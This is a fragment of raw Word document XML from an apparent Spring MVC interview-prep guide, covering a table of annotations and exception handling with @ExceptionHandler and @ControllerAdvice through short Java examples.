          <w:numId w:val="1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iewResolver maps it to an actual view (e.g., employee.jsp).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A40904" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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iew renders the model data and sends the response to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFA96A7" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AB3F0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BE468E0">
          <v:rect id="_x0000_i2045" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="247240FD" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="00AB3F04">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Annotations Used in Spring MV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06"/>
        <w:gridCol w:w="4838"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w14:paraId="4FF13440" w14:textId="77777777" w:rsidTr="00AB3F04">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E33E5DA" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="0011556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nnotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3805C206" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="0011556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urpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w14:paraId="6B622615" w14:textId="77777777" w:rsidTr="00AB3F04">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="736E4D72"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troller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="699DF237"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clares a controller class.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w14:paraId="14E6B696" w14:textId="77777777" w:rsidTr="00AB3F04">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F5BE85E"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questMapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73EE37FC"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ps URLs to methods.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w14:paraId="3103A32E" w14:textId="77777777" w:rsidTr="00AB3F04">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71F74BAA"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etMapping / @PostMapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="371EBB49"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ecific HTTP methods for URL mapping.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w14:paraId="7AA6FE73" w14:textId="77777777" w:rsidTr="00AB3F04">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7397F65F"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sponseBody</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27D39279"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nds Java object directly as response (usually JSON).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w14:paraId="4BE504CA" w14:textId="77777777" w:rsidTr="00AB3F04">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="737C8174"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delAttribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A7F2CC4"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inds request parameters to method parameters.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w14:paraId="532F1A3C" w14:textId="77777777" w:rsidTr="00AB3F04">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BF58BF5"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athVariable / @RequestParam</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0606EFED" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="00AB3F0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ccess path or query parameters.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="510E400B" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AB3F0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49847E6">
          <v:rect id="_x0000_i2046" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6D24F0" w14:textId="76B138AB" w:rsidR="00CB783B" w:rsidRPr="00CE4B95" w:rsidRDefault="00CB783B" w:rsidP="00CB783B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="424" w:name="_Toc196307904"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How do you handle exceptions in Spring MVC?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="424"/>
    </w:p>
    <w:p w14:paraId="352EDF55" w14:textId="766B814C" w:rsidR="00CB783B" w:rsidRPr="00CE4B95" w:rsidRDefault="00CB783B" w:rsidP="00CB783B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="177A73A3" w14:textId="77777777" w:rsidR="008944F0" w:rsidRPr="00CE4B95" w:rsidRDefault="008944F0" w:rsidP="008944F0">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1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@ExceptionHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB2FE3F" w14:textId="77777777" w:rsidR="008944F0" w:rsidRPr="00CE4B95" w:rsidRDefault="008944F0" w:rsidP="008944F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You can write a method annotated with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@ExceptionHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside your controller to catch and handle specific exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C507A7"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C35315"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Controll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1571610"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F61798"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GetMapping</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employee/{id}"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF3C309"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getEmploye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PathVariabl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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> i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58E2B08"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id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ro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llegalArgumentExceptio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Invalid ID"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A15CF1C"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employee"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B75317"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0FB851A"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2E17ED"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ExceptionHandler</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IllegalArgumentException</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class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F58C4FF"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handleIllegalArgumentExceptio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Model</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> mode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xception</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> e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B8A6C0A"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        mode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ddAttribut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err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Message</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485F89C8"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error-page"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1435A8CF"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90BCF55" w14:textId="159FE635"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A08B959" w14:textId="77777777" w:rsidR="008944F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008944F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="6D7F31FC">
          <v:rect id="_x0000_i2047" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBB6A30" w14:textId="77777777" w:rsidR="008944F0" w:rsidRPr="00CE4B95" w:rsidRDefault="008944F0" w:rsidP="008944F0">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 xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Global Exception Handling with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@ControllerAdvice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE5B1FD" w14:textId="77777777" w:rsidR="008944F0" w:rsidRPr="00CE4B95" w:rsidRDefault="008944F0" w:rsidP="008944F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This is used to apply exception handling across multiple controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBE9955"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@ControllerAdvice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510D3190"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GlobalExceptionHandl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233396F"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022EFBD2"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ExceptionHandler</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Exception</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class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7F4603"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odelAndView</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> handleAllExceptions</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Exception</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> e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0ADBDB3"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odelAndView</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> mv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odelAndView</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error-page"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14533B58"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        mv</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ddObjec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errorMess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Message</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5818651A"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mv</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEB70E2"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5567127"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103FEA52"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ExceptionHandler</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ResourceNotFoundException</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class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0CF6B8"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odelAndView</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> handleResourceNotFound</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ResourceNotFoundException</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> e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F61F41F"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odelAndView</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> mv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odelAndView</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404-page"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDF05BA"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
